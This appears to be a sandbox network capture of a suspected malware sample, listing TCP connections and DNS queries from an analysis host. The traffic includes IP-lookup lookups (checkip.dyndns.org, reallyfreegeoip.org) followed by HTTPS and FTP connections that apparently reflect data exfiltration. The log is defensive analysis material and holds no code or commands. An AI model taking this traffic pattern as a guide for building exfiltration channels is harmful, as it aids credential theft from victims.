                                                                                                                            Dec 14, 2024 13:49:29.801078081 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.808715105 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.808751106 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.808892012 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.818154097 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.819210052 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.938977003 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.993357897 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.998238087 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.998342037 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.998368979 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.026715994 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.034759045 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.042740107 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.135431051 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.135452986 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.135628939 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.146553040 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.148289919 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.154540062 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.206100941 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.268551111 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.270127058 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.341561079 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.351339102 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.355276108 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.355325937 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.357631922 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.460983038 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.464256048 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.465878010 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.466001034 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.466020107 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.466144085 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.468674898 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.468893051 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.471193075 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.477596998 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.584124088 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.588484049 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.588556051 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.666448116 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.670193911 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.776544094 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.779516935 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.780611992 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.780687094 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.783044100 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.786501884 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.786556959 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.786567926 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.786628962 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.788845062 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.789182901 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:30.789997101 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.899399042 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.902810097 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.908582926 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.908894062 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.984987020 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:30.988409042 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.095259905 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.097814083 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.100831032 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.100939989 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.102943897 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.105568886 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.105647087 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.105653048 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.105830908 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.107846022 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.107880116 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.108306885 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.217674971 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.222660065 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.229794979 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.229873896 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.303122997 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.305912971 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.415678978 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.419135094 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.421935081 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.422198057 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.424479008 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.426781893 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.426851034 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.426904917 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.426964998 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.430588007 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.431612968 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.544317007 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.551933050 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.631572962 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.634620905 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.736645937 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.739460945 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.743098021 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.743166924 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.745452881 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.748047113 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:31.748094082 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:31.748132944 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:47.818170071 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:47.938144922 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:47.938242912 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:47.938636065 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:48.058357954 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.338435888 CET44349730172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.349328995 CET49730443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:48.349396944 CET44349730172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.779988050 CET44349730172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.780145884 CET44349730172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.780320883 CET49730443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:48.780764103 CET49730443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:48.796210051 CET4972880192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:48.812772989 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:48.916352034 CET8049728193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.916412115 CET4972880192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:48.932503939 CET8049733193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:48.932580948 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:48.932734013 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:49.052385092 CET8049733193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.209090948 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.212517023 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:49.332324982 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.619646072 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.652528048 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:49.652560949 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.652636051 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:49.656516075 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:49.656533003 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:49.672852039 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:50.199438095 CET8049733193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.200676918 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.200726986 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.200953960 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.201208115 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.201222897 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.250962019 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:50.872735023 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.872853994 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.874514103 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.874522924 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.874914885 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:50.922822952 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.929488897 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:50.971338034 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.320065975 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.320157051 CET44349734172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.320198059 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.323129892 CET49734443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.326878071 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.421669960 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.431302071 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.431339025 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.449059963 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.734481096 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.736869097 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.736922979 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.737025976 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.737535000 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.737552881 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.782215118 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.867881060 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.868056059 CET44349735172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.868117094 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.868571043 CET49735443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:51.871908903 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.872993946 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.992404938 CET8049733193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.992499113 CET4973380192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.993309021 CET8049737193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:51.993376970 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:51.993699074 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:52.113372087 CET8049737193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:52.954085112 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:52.956073999 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:52.956091881 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.282005072 CET8049737193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.283919096 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:53.283968925 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.284039974 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:53.284328938 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:53.284348965 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.329077959 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.407474995 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.407542944 CET44349736172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.407757998 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:53.408233881 CET49736443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:53.412626028 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.414522886 CET4974080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.532991886 CET8049731193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.533094883 CET4973180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.534338951 CET8049740193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:53.534426928 CET4974080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.534574986 CET4974080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:53.654323101 CET8049740193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.496635914 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.498661995 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.498703003 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.941438913 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.941520929 CET44349739172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.941605091 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.942133904 CET49739443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.946521997 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:54.947341919 CET4974180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:54.991236925 CET8049740193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.992520094 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.992589951 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:54.992682934 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.992985010 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:54.993001938 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:55.032238960 CET4974080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:55.067153931 CET8049737193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:55.067311049 CET4973780192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:55.067909002 CET8049741193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:55.068129063 CET4974180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:55.082681894 CET4974180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:55.202605963 CET8049741193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.219755888 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.222090960 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.222111940 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.351850033 CET8049741193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.353164911 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.353195906 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.353272915 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.353935003 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.353950024 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.407340050 CET4974180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:56.684366941 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.684545040 CET44349742172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.684858084 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.685116053 CET49742443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:56.690201998 CET4974480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:56.810801029 CET8049744193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:56.810906887 CET4974480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:56.811084032 CET4974480192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:56.930823088 CET8049744193.122.6.168192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:57.658719063 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:57.660455942 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:57.660494089 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.106734037 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.106894970 CET44349743172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:58.106978893 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:58.107345104 CET49743443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:49:58.113181114 CET4974180192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:49:58.114283085 CET4974680192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:28.741283894 CET44349767172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:28.782285929 CET4976680192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:29.958041906 CET44349767172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:29.959727049 CET49767443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:29.959745884 CET44349767172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.404712915 CET44349767172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.404783964 CET44349767172.67.177.134192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.405101061 CET49767443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:30.405462980 CET49767443192.168.2.6172.67.177.134
                                                                                                                            Dec 14, 2024 13:50:30.415141106 CET4976680192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:30.416090012 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:30.416136026 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.416220903 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:30.416642904 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:30.416660070 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.535258055 CET8049766132.226.247.73192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:30.535399914 CET4976680192.168.2.6132.226.247.73
                                                                                                                            Dec 14, 2024 13:50:31.785404921 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:31.785484076 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:31.786937952 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:31.786945105 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:31.787183046 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:31.788613081 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:31.835330009 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:32.299201965 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:32.299266100 CET44349768149.154.167.220192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:32.299333096 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:32.301582098 CET49768443192.168.2.6149.154.167.220
                                                                                                                            Dec 14, 2024 13:50:37.454809904 CET4974080192.168.2.6193.122.6.168
                                                                                                                            Dec 14, 2024 13:50:39.129287958 CET4977021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:39.249408960 CET2149770119.18.54.39192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:39.249685049 CET4977021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:39.250030041 CET4977021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:50:39.369945049 CET2149770119.18.54.39192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:39.370012999 CET4977021192.168.2.6119.18.54.39
                                                                                                                            Dec 14, 2024 13:51:01.550795078 CET4970880192.168.2.6199.232.210.172
                                                                                                                            Dec 14, 2024 13:51:01.550825119 CET49706443192.168.2.620.190.181.4
                                                                                                                            Dec 14, 2024 13:51:01.731396914 CET8049708199.232.210.172192.168.2.6
                                                                                                                            Dec 14, 2024 13:51:01.731427908 CET4434970620.190.181.4192.168.2.6
                                                                                                                            Dec 14, 2024 13:51:01.731441021 CET4970880192.168.2.6199.232.210.172
                                                                                                                            Dec 14, 2024 13:51:01.731476068 CET49706443192.168.2.620.190.181.4
                                                                                                                            Dec 14, 2024 13:51:02.673247099 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:51:02.793632984 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:51:02.795967102 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:51:07.767340899 CET49711443192.168.2.620.190.181.4
                                                                                                                            Dec 14, 2024 13:51:07.887731075 CET4434971120.190.181.4192.168.2.6
                                                                                                                            Dec 14, 2024 13:51:07.887857914 CET49711443192.168.2.620.190.181.4
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 14, 2024 13:49:36.086127043 CET5302353192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:49:36.224576950 CET53530231.1.1.1192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:38.007072926 CET6511353192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:49:38.469408035 CET53651131.1.1.1192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:42.295229912 CET6341853192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:49:42.437077999 CET53634181.1.1.1192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:06.783317089 CET6446353192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:50:06.920958042 CET53644631.1.1.1192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:10.816241980 CET5917853192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:50:10.953824997 CET53591781.1.1.1192.168.2.6
                                                                                                                            Dec 14, 2024 13:50:18.197474003 CET6051053192.168.2.61.1.1.1
                                                                                                                            Dec 14, 2024 13:50:18.946362972 CET53605101.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 14, 2024 13:49:36.086127043 CET | 192.168.2.6 | 1.1.1.1 | 0xbb37 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:38.007072926 CET | 192.168.2.6 | 1.1.1.1 | 0x86e3 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 14, 2024 13:49:42.295229912 CET | 192.168.2.6 | 1.1.1.1 | 0x74d9 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
